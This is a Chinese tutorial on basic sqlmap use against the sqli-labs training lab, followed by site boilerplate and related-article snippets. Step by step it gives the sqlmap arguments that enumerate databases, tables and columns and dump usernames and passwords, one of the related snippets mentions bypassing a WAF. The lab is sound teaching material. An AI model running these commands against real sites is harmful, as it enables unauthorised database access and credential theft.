sqlmap的基础使用

这篇具有很好参考价值的文章主要介绍了sqlmap的基础使用。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、以less-3/为入口,利用sqlmap实施自动化注入,获取sqli-labs网站的登录账户和密码

1、访问http://192.168.207.1/sql/Less-3,启动sqlmap

2、寻找注入点http://192.168.207.1/sql/Less-3/?id=1

sqlmap的基础使用

3、 获取数据库的所有库名 -u "http://192.168.207.1/sql/Less-3/?id=1"

sqlmap的基础使用

4、获取网站当前所在数据库的库名 -u "http://192.168.207.1/sql/Less-3/?id=1" --dbs

sqlmap的基础使用

5、获取数据库security的所有表名  -u "http://192.168.207.1/sql/Less-3/?id=1" --current-db

sqlmap的基础使用

 6、获取users表中的全部字段名  -u "http://192.168.207.1/sql/Less-3/?id=1" -D security --tables

sqlmap的基础使用

 7、获取users表id、password、username字段的全部值  

-u "http://192.168.207.1/sql/Less-3/?id=1" -D security -T users -C id,username,password --dump

  

sqlmap的基础使用

二、以less-4/为入口,利用sqlmap实施自动化注入,获取sqli-labs网站的登录账户和密码。

1、利用burp suit抓取http://192.168.207.1/sql/Less-4/?id=1的包

2、将拦截的报文以a.txt文档保存在c盘根目录下

3、寻找注入点,获取网站所在数据库基本信息 -r C:\a.txt

sqlmap的基础使用

4、获取所有数据库的库名  -r C:\a.txt --dbs

sqlmap的基础使用

5、获取当前网站所在数据库的库名  -r C:\a.txt --current-db

 sqlmap的基础使用

6、获取数据库security的所有表名  -r C:\a.txt -D security --tables

sqlmap的基础使用

7、获取users表中的所有字段   -r C:\a.txt -D security -T users --columns

sqlmap的基础使用

8、获取id、password、username字段的所有值  -r C:\a.txt -D security -T users -C id,username,password --dump

 sqlmap的基础使用

 文章来源地址https://www.toymoban.com/news/detail-462491.html

 

 

 

 

 

 

到了这里,关于sqlmap的基础使用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • WEB漏洞-SQL注入-利用SQLMAP工具绕过WAF

    访问使用阿里云搭建的网站(存在自带的阿里云盾)。 可以看到此时网站可以正常访问,可以进行正常注入。 使用工具进行注入。 可以看到在使用工具注入没多久后便返回了不存在注入点的信息。 因为经常会用到SQLMAP这款工具对注入点进行检测,在遇到WAF时,如果还想继续

    2024年02月12日
    浏览(42)
  • 利用less实现多主题切换(配合天气现象)

    1. 先看效果: 2. 话不多说直接撸吧: 原理:先给body元素添加style,再根据天气现象动态更改style 开撸: 创建src/assets/style/variables.less 使用 @XXX:var(–XXX,‘style’) 声明系列变量,之后添加其他变量直接增加即可(由于之后要配置颜色,默认值可以先给\\\" \\\") 也可以声明一下常用

    2024年02月09日
    浏览(35)
  • 利用Sqlmap API接口联动Google Hacking批量SQL注入检测

    目录 前言 slghack自动化搜集URL Sqlmap API 脚本slghack_sqli 挖掘SQL注入漏洞的一种方式就是通过Google Hacking搜索那些可能存在SQL的URL,然后手工的探测注入点。但是现在的SQL注入漏洞的网站是比较少的了,所以这样一个一个手工测效率有一点低。 sqlmap比较好的一点是可批量扫描多个

    2024年04月14日
    浏览(34)
  • 微服务韧性工程:利用Sentinel实施有效服务容错与限流降级

            目录 一、雪崩效应 二、Sentinel 服务容错         2.1 Sentinel容错思路         2.2 内部异常兼容         2.3 外部流量控制 三、Sentinel 项目搭建 四、Sentinel 工作原理         服务容错是微服务设计中一项重要原则和技术手段,主要目标是在服务出现故障、网络波

    2024年03月15日
    浏览(80)
  • webpack5基础使用(1)-介绍、打包文件、处理样式资源(css、less)文件、配置文件内容、eslint工具检测语法、babel工具es6语法转es5

    webpack5是一个 静态资源打包工具 。 会以一个或多个文件作为打包的入口,将整个项目所有文件编译组合成一个或多个文件输出出去。输出的文件就是编译好的文件,就可以直接在浏览器端运行了 进一步来说就是: 当开发时,肯定会使用框架、es6模块化语法、less/sass等css预处

    2024年02月03日
    浏览(54)
  • Background-1 基础知识 sqli-Labs Less1-Less-4

    在第一关我们可以尝试增加一个单引号进行尝试 错误显示如下: 推测语法的结构 上述错误中我们可以推测由于增加了 1’ 导致语法变成 \\\'1\\\'\\\' limit 0,1 ,是由于多加了一个 \\\' 造成的后果。 下面是尝试解决的方法 尝试 \\\' or 1=1--+ 把但单引号给闭合 此时的语句构成如下代码段: 接下

    2024年02月08日
    浏览(43)
  • 大数据基础平台实施及运维

    1、为什么使用大数据技术 数据量越来越大,数据分析的实时性越来越强,数据结果应用范围越来越广。(从用户的访问量、量、访问时间、访问频率,市场可以得到很多信息) 2、大数据的定义 数据收集、数据清洗、数据处理就是大数据技术的整个流程。 1.广告 广告投放 

    2024年02月17日
    浏览(33)
  • 【数据仓库设计基础(四)】数据仓库实施步骤

    实施一个数据仓库项目的主要步骤是: 定义项目范围 收集并确认业务需求和技术需求 逻辑设计 物理设计 从源系统向数据仓库装载数据 使数据可以被访问以辅助决策 管理和维护数据仓库 项目范围定义了一个数据仓库项目的边界。典型的范围定义是组织、地区、应用、业务

    2024年02月08日
    浏览(40)
  • 大数据基础平台实施及运维进阶

    完全分部式是真正利用多台Linux主机来进行部署Hadoop,对Linux机器集群进行规划,使得Hadoop各个模块分别部署在不同的多台机器上。 分别处于Active和Standby中  hadoop可以创建多个副本到各个datanode中实现高可用,但是如果要防止出现问题必须给namenode做一个备用服务器。 HA的意思

    2024年02月11日
    浏览(42)
  • 开源大数据集群部署(二)集群基础环境实施准备

    作者:櫰木 本次使用到的二进制软件包目录为:系统初始化前提是操作系统已完成安装、各个主机之间网络互通,系统常用命令已安装,本默认这些前提条件已具备,不在阐述。 安装centos系统完成后需要对主机进行初始化配置和验证工作,在所有主机上(hd1.dtstack.com-hd3)均

    2024年02月03日
    浏览(48)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包